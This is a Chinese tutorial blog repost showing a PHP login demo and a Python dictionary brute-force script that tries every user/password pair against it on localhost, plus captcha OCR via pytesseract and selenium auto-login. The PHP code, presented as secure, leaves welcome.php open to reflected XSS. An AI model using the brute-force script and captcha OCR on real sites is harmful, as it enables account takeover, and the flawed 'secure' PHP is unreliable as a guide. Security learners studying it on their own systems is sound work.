php安全编程&python测试实例编写

最新推荐文章于 2024-08-16 14:43:42 发布
最新推荐文章于 2024-08-16 14:43:42 发布
阅读量59 收藏
点赞数
原文链接:https://my.oschina.net/ichunqiu/blog/863876
版权

前言

本文首发i春秋论坛。

本篇文章主要分享一个python暴破脚本,该脚本采用optparse模块,支持自定义字典位置;用了多线程(虽然我感觉和单线程速度差不多。。是我的错觉还是线程写的不对。。求表哥们指教)。

一、PHP安全编程
这篇文章暴破的目标是自己写的一个简单demo,php写的,用了PDO预编译预防SQLI,用了htmlspecialchars简单防御xss,源码放出来:
数据库配置文件(dbname:pybp;table:pybp_table;column:username,passwd)Con_self.php:
 

<?php  
$pdo = new PDO('mysql:host=localhost;dbname=pybp', 'root', 'root');  
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);  
$pdo->exec("set names 'utf8'");  
?>


登录处文件login_self.php:
 

<?php  
include('con_self.php');  
?>  
<form action='' method='POST' name='form1'>  
user:  <input type='text' name='username'><br>  
passwd:<input type='text' name='passwd'><br>  
<input type='submit' value='login' name='login'>  
<input type='submit' value='add' name='add'>  
</form>  
<?php  
if(isset($_POST['add'])){  
    $username = htmlspecialchars($_POST['username']);  
    $passwd = htmlspecialchars($_POST['passwd']);  
    $sm = $pdo->prepare("insert into pybp_table(username,passwd) values(?,?)");  
    $sm->execute(array($username,md5($passwd)));  
}  
if(isset($_POST['login'])){  
    $username = htmlspecialchars($_POST['username']);  
    $passwd = htmlspecialchars($_POST['passwd']);  
    $smt = $pdo->prepare("select * from pybp_table");  
    $smt->execute(array());  
    $result = $smt->fetchAll();  
    if($username===$result[0]['username']&&md5($passwd)===$result[0]['passwd']){  
        header("Location:/pybp_pdo/welcome_self.php"."?user=".$username);  
    }  
    else{  
        echo 'login fail';  
    }  
}  
?>


以及登录认证成功后跳转的welcome.php:        
 

<html>  
<p>welcome <?php echo $_GET['user'];?></p>  
<html>


有关于csrf防御,参见http://bbs.ichunqiu.com/thread-15186-1-1.html,就不赘述了。
Ok,看看界面:


然后咱们就试试爆破这个登陆界面了

二、python登陆暴破
py脚本原版先放出来:
 

#coding: utf-8  
#author: xiaoye  
import requests  
   
if __name__ == '__main__':  
    data = {}  
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'}  
    url = 'http://localhost/pybp_pdo/login_self.php'  
    #data = {'username':'admin','passwd':'admin','login':'login'}  
    userlist = [x.strip('\n') for x in open('pybp_self_user.txt').readlines()]  
    #print userlist  
    passwdlist = [x.strip('\n') for x in open('pybp_self_passwd.txt').readlines()]  
    #print passwdlist  
    for user in userlist:  
        for passwd in passwdlist:  
            data['username'] = user  
            data['passwd'] = passwd  
            data['login'] = 'login'  
            print data  
            r = requests.post(url,data=data,headers=headers)  
            if r.status_code == 200:  
                if r.content.find('welcome') != -1:  
                    print 'user:%s, passwd:%s' % (user,passwd)  
                    exit(0)  
            data.clear()


运行截图:



整个程序用列表生成式,获取了user 、passwd两个字典的全部内容,并且将它们组合为dict形式,用requests.post去一一模拟登陆,并从返回的页面源码中提取响应的关键字来判断是否已经登陆成功。

基本的思想就是这样,但是前面的这个程序很死,连字典位置都不能自定义,速度有点慢(这个其实正常,两个只含有10个词字典,10*10的话,就要爆破100次,而且requests的速度还受网络的限制)

改善版:

optparse自定义字典位置(多线程出了点问题,我改完后放出来):
 

#coding: utf-8  
#author: xiaoye  
import requests  
from optparse import OptionParser  
   
if __name__ == '__main__':  
    parse = OptionParser()  
    parse.add_option('-u','--u',dest='userfile',type='string',help='specify user file')  
    parse.add_option('-p','--p',dest='passfile',type='string',help='specify passwd file')  
    option,args = parse.parse_args()  
    data = {}  
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'}  
    url = 'http://localhost/pybp_pdo/login_self.php'  
    #data = {'username':'admin','passwd':'admin','login':'login'}  
    userlist = [x.strip('\n') for x in open(option.userfile).readlines()]  
    #print userlist  
    passwdlist = [x.strip('\n') for x in open(option.passfile).readlines()]  
    #print passwdlist  
    for user in userlist:  
        for passwd in passwdlist:  
            data['username'] = user  
            data['passwd'] = passwd  
            data['login'] = 'login'  
            print data  
            r = requests.post(url,data=data,headers=headers)  
            if r.status_code == 200:  
                if r.content.find('welcome') != -1:  
                    print 'user:%s, passwd:%s' % (user,passwd)  
                    exit(0)  
            data.clear()


看运行gif:



Optparse模块还是挺好用的,命令行参数用着方便些

关于爆破,有个坑得说一说,验证码
关于验证码识别,我常用的是tesseract-ocr,效果还行吧,对中文的识别比较蛋疼。。。。。。
从csdn截了个验证码,试试看效果:



效果还可以
对于python这种轮子众多的语言来讲,也有自己处理验证码的模块,pytesseract (依赖于tesseract&&PIL)
用法如下:
 

#coding: utf-8  
import pytesseract  
import PIL  
image = PIL.Image.open('v2code.png')  
v = pytesseract.image_to_string(image)  
print v


效果:



遇见有验证码的登陆窗口,我们可以向上面的小程序用python做简单处理

三、小彩蛋
这次小彩蛋挺有意思的,介绍了python selenium,有关于selenium,光是安装就是个大坑,可以试着去踩踩~。。。。。。tips:selenium 启动不了过高版本firefox,要安装引擎文件;默认selenium操作firefox会打开一个初始的,没有任何插件的火狐浏览器,这时候可以指明firefox profile,启动我们日常用的浏览器(安装一下就知道我说的意思了。。)

代码:(自动化打开firefox,打开csdn登陆界面,自动化输入用户名/密码登陆)
截图工具崩了。。借个网上的图来看看情况https://img-blog.csdn.net/20150821031951877
下面代码运行情况和这个情况差不多,全程是不需要人手工点击的,自动化完成,自动化登录csdn源码如下:
 

from selenium import webdriver   
from selenium.webdriver.common.keys import Keys   
import time   
import re  
     
profile_dir = r"C:\Users\xiaoye\AppData\Roaming\Mozilla\Firefox\Profiles\3xhizvy7.default"  
profile = webdriver.FirefoxProfile(profile_dir)  
driver = webdriver.Firefox(profile)   
driver.get("https://passport.csdn.net/account/login?from=http://my.csdn.net/my/mycsdn")   
elem_user = driver.find_element_by_name("username")   
elem_user.send_keys("your username")  
elem_pwd = driver.find_element_by_name("password")   
time.sleep(2)  
elem_pwd.send_keys("your passwd")   
elem_pwd.send_keys(Keys.RETURN)   
time.sleep(5)   
assert "baidu" in driver.title   
driver.close()   
driver.quit()



其中,profile_dir是火狐的配置文件地址,每个人都不一样
your username是你的用户名,passwd是你的密码
运行之后,就自动化操作了
为啥python爆破会讲到这个呢?。。自动化能不能爆破呢?当然可以,下次有时间试试吧
Selenium经常应用在自动化测试以及爬虫上,普通静态页面抓取一般只需要三个模块:re正则模块  bs4解析模块 requests请求模块;但是对于像ajax动态生成的页面,selenium是个不错的选择。

转载于:https://my.oschina.net/ichunqiu/blog/863876

chengman3837
关注
PHP中调用Python并获取运行结果
soarli的博客
01-22 6716
版权 本文首发于soarli博客,转载请注明来源。传送门 前言 在毕设中需要用到PHP传递参数调用Python脚本并获取后者返回的结果,经过查阅资料该问题得以解决。 思路 PHP借助shell_exec通过类似于python sum.py $aa $bb的形式以执行系统命令的方式传递参数给Python文件; Python则通过sys.argv(需引入sys模块)来接收命令中所包含的参数(需要注意的是:此时传入的参数都会被默认为str类型,需要在函数内部进行解析和转换)并将处理结果通过print函数输出; P
网络安全 Python 编程指南
2401_84247617的博客
04-29 927
自动化这些过程的能力不仅可以减少时间,还可以减少错误。高达 90% 的安全事件是人为错误的直接结果。从安全角度来看,您越能摆脱对人类行为者的依赖,就越好。所以这就引出了一个问题,我怎样才能学会自动化这样的流程?博托3===
python编写poc_分享使用python编写poc,exp的实例教程
weixin_31542609的博客
01-14 1746
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
30 个 Python 编程实用技巧
努力是为了站在万人之中,成为别人的光
10-03 2万+
作者主页:海拥 作者简介:CSDN全栈领域优质创作者、HDZ核心组成员、蝉联C站周榜前十 粉丝福利:粉丝群 每周送四本书,每月送各种小礼品(搪瓷杯、抱枕、鼠标垫、马克杯等) 直接跳到末尾 去评论区领书 今天,我给大家带来了一些基本的 Python 编程技巧。所有这些技巧都可以帮助您减少代码并优化执行。你可以在处理常规任务时轻松地在实时项目中使用它们。 目录 1.就地交换两个数字 2.比较运算符的链接 3.使用三元运算符进行条件赋值。 4.使用多行字符串
Python Web编程入门
cnds123的专栏
12-08 3182
Python Web编程入门 Web应用开发主要是建立在B/S架构模式下,衍生出来的一系列web应用程序,即主要是基于浏览器的应用程序开发,这也是web应用程序开发的基础,比如淘宝、京东、当当网等。Web开发在近年来,随着本身技术的突破以及移动设备的普及,基于web领域的开发,也出现了明确的岗位职责分工,一个web互联网产品中,基本上会分为web UI设计、Web前端开发以及web后端开发。 Web应用开发由分文分为前端(front-end)、后端(back-end)、全栈(full stac.
Python黑帽子--黑客与渗透测试编程之道
热门推荐
giantbranch的专栏
01-30 8万+
为了方便查找,请看目录(手机端就没有目录哦)→→→→→→→→→→→→→→→ 注:本文篇幅较大,请耐心等待(power by 《Python黑帽子:黑客与渗透测试编程之道 》)   欢迎光顾我的新博客:https://www.giantbranch.cn   终于学完了,也敲完代码了,其中有好几个都没成功实践出作者的预期结果,知道我哪里错的,欢迎指点。(有问题的同学可以看看评论,或许有其他...
100个必会的python脚本,python脚本编写教程
2401_86114424的博客
07-18 1020
Python 是一种面向对象、解释型、弱类型的脚本语言,它也是一种功能强大而完善的通用型语言python和c语言哪个更实用。相比其他编程语言(比如 Java),Python 代码非常简单,上手非常容易。比如我们要完成某个功能,如果用 Java 需要 100 行代码,但用 Python 可能只需要 20 行代码,这是 Python 具有巨大吸引力的一大特点。Python 的两大特色是清晰的语法和可扩展性:Python 的语法非常清晰,它甚至不是一种格式自由的语言。
Python学习教程】Python编程基础
qq_41854911的博客
01-23 5639
文章目录编程语言是什么编译型语言和解释型语言的区别编译型语言1) 可执行程序不能跨平台2) 源代码不能跨平台解释型语言关于 Python总结Python是什么,Python简介Python的特点(优点和缺点)Python 的优点1) 语法简单2) Python 是开源的3) Python 是免费的4) Python 是高级语言5) Python 是解释型语言,能跨平台5) Python 是面向对象的编程语言6) Python 功能强大(模块众多)7) Python 可扩展性强Python 的缺点1) 运行速
Python socket编程
SmartShepi的博客
04-08 2603
目录socket编程Python socketTCP客户端服务端UDP客户端服务端实例&常见问题构建http服务Python http客户端服务端实例&常见问题 socket编程 Python socket TCP 客户端 服务端 UDP 客户端 服务端 实例&常见问题 构建http服务 Python http 客户端 服务端 实例&常见问题 相关文章: Socket编程原理 Golang socket编程 Java socket编程 PHP socket编程 ...
python 网络编程_Python网络编程从入门到精通
weixin_39611037的博客
11-23 388
Python网络编程从入门到精通》编写秉承让更多的 Python 爱好者能看懂的原则,以让读者以较少的时间、较低的成本,快速掌握 Python 网络编程为目标。每个步骤都很详尽,读者可按步骤操作,还配有相应代码,方便读者实现网络编程的开发。 (1)力求简洁易懂。本书编写按先语法,后实例,很后结果展示的顺序,符合人们的认知过程,目的就是为了让读者看得懂、学得会、做得出。 (2)专注网络...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
在网络安全领域,文件上传木马是一个重要的议题,尤其在Python网络安全项目开发中。黑客常常利用文件上传漏洞来植入木马,以控制服务器。文件上传木马的类型主要分为大马和小马,根据文件大小来区分。小马通常用于...
Python零基础入门之编写测试实例
WhyLW的博客
08-31 366
测试函数 首先是给出用于测试的代码,如下所示,这是一个接收姓和名然后返回整洁的姓名的函数: def get_formatted_name(first, last): full_name = first + ' ' + last return full_name.title() 简单的测试代码: first = 'kobe' last = 'bryant' print(get_formatted_name(first, last)) # 输出 Kobe Bryant 在 Python 标.
Python单元测试安全测试浅析
公众号已改名为-程序员阿沐
10-13 266
这个也是功能测试安全测试的初衷。
Python】高效的Web自动化测试利器—Python+Playwright快速上手自动化实战指南
墩墩分墩
08-16 1625
**Playwright是微软在` 2020 年初 `开源自动化测试工具,功能和 selenium 类似,都可以驱动浏览器进行各种自动化操作。** - 支持主流浏览器,如Chrome、Firefox、Safari 等,同时支持以**无头模式、有头模式**运行,并提供了**同步、异步的 API**,可以结合 `主流测试框架`使用,并且支持浏览器端的自动化脚本录制等功能。 **特点:** - 跨浏览器:Playwright 支持所有现代渲染引擎,包括Chromium、WebKit 和 Firefox; - 跨
卷积神经网络程序-matlab
10-03
卷积神经网络程序-matlab-设置基本参数规格,卷积,降采样层,卷积核的大小
利用神经网络实现DNN信号均衡.zip
最新发布
10-03
利用神经网络实现DNN信号均衡
基于文本增强与争议融合的虚假信息检测模型设计源码
10-03
该项目为吉大毕业论文设计源码,主题为基于文本增强与争议融合的虚假信息检测模型。项目包含20个文件,主要包括14个Python源代码文件、2个文本文件、1个Git忽略文件、1个许可证文件、1个Markdown文件、1个JSON文件。该模型旨在提高虚假信息检测的准确性,适用于相关研究与应用场景。
MATLAB 实现的蜜蜂算法优化卷积神经网络(Bee-CNN)进行图像分类预测的详细实例(包含详细的完整的程序和数据)
10-03
内容概要:本文提供了一个基于MATLAB的应用案例来演示蜜蜂算法优化卷积神经网络进行图像识别的具体流程,具体步骤从数据准备、CNN模型构建开始,到用蜜蜂算法优化权值参数、最后是模型训练以及效果评测。附带详尽完整且可以立即使用的源码与实验数据。 适用人群:熟悉 MATLAB 开发环境的基础用户,对图像分类、卷积神经网络及其改进方法有一定理论了解的工程技术人员。 使用场景及目标:该示例适用于初学者掌握MATLAB环境中结合蜜蜂算法改进的卷积神经网路设计技巧、用于解决复杂的图像识别任务。 阅读建议:学习前先确保自己的MATLAB安装完毕并且对基本操作有了解。建议边学习理论边实践尝试修改部分实验参数以便深入了解各个阶段的效果变化。
夏季研究:求解微分方程的神经网络.zip
10-03
夏季研究:求解微分方程的神经网络
PHP高级编程:模式、框架与测试资源大全
PHP编程中,掌握这些概念能够帮助开发者提高代码质量和效率,同时使得项目更具可维护性和扩展性。 首先,模式是解决常见问题的标准化解决方案。在PHP中,常见的设计模式如工厂模式、单例模式、观察者模式等,都是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值